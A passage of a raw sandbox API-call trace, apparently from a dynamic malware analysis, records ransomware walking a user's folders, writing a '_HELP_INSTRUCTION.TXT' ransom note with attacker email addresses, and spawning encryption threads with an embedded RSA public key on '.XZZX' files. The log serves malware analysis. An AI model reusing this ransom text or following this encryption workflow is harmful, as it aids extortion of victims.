pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0198.937] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0198.937] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0xd90) returned 0x0 [0198.938] RegQueryValueExW (in: hKey=0xd90, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b8418, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x43b8418*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0198.938] RegCloseKey (hKey=0xd90) returned 0x0 [0198.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0198.938] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0198.938] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd90 [0198.938] CloseHandle (hObject=0xd90) returned 1 [0198.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0198.938] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0198.938] lstrcpyW (in: lpString1=0x17a5a4, lpString2="2SS69ds5b7DlSJShTY0o" | out: lpString1="2SS69ds5b7DlSJShTY0o") returned="2SS69ds5b7DlSJShTY0o" [0198.938] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0198.938] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0198.938] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.938] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0198.938] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.938] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.938] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.938] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.938] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.939] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.939] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.939] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.939] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0198.939] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0198.939] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0198.939] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0198.939] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0198.939] lstrcmpW (lpString1="O903hcW", lpString2="..") returned 1 [0198.939] lstrcmpW (lpString1="O903hcW", lpString2=".") returned 1 [0198.939] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0" [0198.939] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\" [0198.939] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\", lpString2="O903hcW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" [0198.939] SetErrorMode (uMode=0x1) returned 0x1 [0198.939] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" [0198.939] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0198.939] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0198.939] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*" [0198.939] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0198.940] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="O903hcW" [0198.940] lstrcpyW (in: lpString1=0x17a5a4, lpString2="O903hcW" | out: lpString1="O903hcW") returned="O903hcW" [0198.940] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.940] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0198.940] lstrcmpW (lpString1="60CA942226AA4A29961B00962ADF2E71.XZZX", lpString2="..") returned 1 [0198.940] lstrcmpW (lpString1="60CA942226AA4A29961B00962ADF2E71.XZZX", lpString2=".") returned 1 [0198.940] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0198.940] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="ntldr") returned 0x0 [0198.940] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="NTLDR") returned 0x0 [0198.940] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0198.940] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="ntdetect.com") returned 0x0 [0198.940] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned 67 [0198.940] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") [0198.940] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.940] lstrcpyW (in: lpString1=0x17addc, lpString2="60CA942226AA4A29961B00962ADF2E71.XZZX" | out: lpString1="60CA942226AA4A29961B00962ADF2E71.XZZX") returned="60CA942226AA4A29961B00962ADF2E71.XZZX" [0198.940] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0198.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd98 [0198.941] Sleep (dwMilliseconds=0x96) [0199.093] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0199.093] lstrcmpW (lpString1="E29C4433332B9D3DB3332D67374C8185.XZZX", lpString2="..") returned 1 [0199.093] lstrcmpW (lpString1="E29C4433332B9D3DB3332D67374C8185.XZZX", lpString2=".") returned 1 [0199.093] StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0199.093] StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="ntldr") returned 0x0 [0199.093] StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="NTLDR") returned 0x0 [0199.093] StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0199.093] StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="ntdetect.com") returned 0x0 [0199.093] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned 67 [0199.093] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") [0199.093] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.093] lstrcpyW (in: lpString1=0x17addc, lpString2="E29C4433332B9D3DB3332D67374C8185.XZZX" | out: lpString1="E29C4433332B9D3DB3332D67374C8185.XZZX") returned="E29C4433332B9D3DB3332D67374C8185.XZZX" [0199.093] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0199.093] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd9c [0199.094] Sleep (dwMilliseconds=0x96) [0199.248] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0199.248] lstrcmpW (lpString1="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpString2="..") returned 1 [0199.249] lstrcmpW (lpString1="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpString2=".") returned 1 [0199.249] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0199.249] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="ntldr") returned 0x0 [0199.249] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="NTLDR") returned 0x0 [0199.249] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0199.249] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="ntdetect.com") returned 0x0 [0199.249] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned 67 [0199.249] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") [0199.249] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0199.249] lstrcpyW (in: lpString1=0x17addc, lpString2="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" | out: lpString1="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX") returned="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" [0199.249] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0199.249] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xda0 [0199.250] Sleep (dwMilliseconds=0x96) [0199.404] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0199.404] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0199.405] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0199.405] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0199.405] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0199.405] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0199.405] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0199.405] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW" [0199.405] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*" [0199.405] SetErrorMode (uMode=0x1) returned 0x1 [0199.405] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\_HELP_INSTRUCTION.TXT") returned 84 [0199.405] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0199.405] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0199.406] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0xda4) returned 0x0 [0199.406] RegQueryValueExW (in: hKey=0xda4, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43b8648, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x43b8648*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0199.406] RegCloseKey (hKey=0xda4) returned 0x0 [0199.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0199.406] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0199.406] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\o903hcw\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xda4 [0199.406] CloseHandle (hObject=0xda4) returned 1 [0199.406] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdea18 [0199.406] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW") returned="O903hcW" [0199.406] lstrcpyW (in: lpString1=0x17a5a4, lpString2="O903hcW" | out: lpString1="O903hcW") returned="O903hcW" [0199.406] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0199.406] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0199.406] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0199.406] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0199.406] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0199.406] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0199.406] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0199.407] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0199.407] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0199.407] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 1 [0199.407] FindClose (in: hFindFile=0x3cdea18 | out: hFindFile=0x3cdea18) returned 0 [0199.407] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0199.407] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0199.407] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0199.407] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0199.407] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0199.407] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0199.407] lstrcmpW (lpString1="xAriJR5aTdl", lpString2="..") returned 1 [0199.407] lstrcmpW (lpString1="xAriJR5aTdl", lpString2=".") returned 1 [0199.407] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0199.407] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0199.407] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="xAriJR5aTdl" | out: 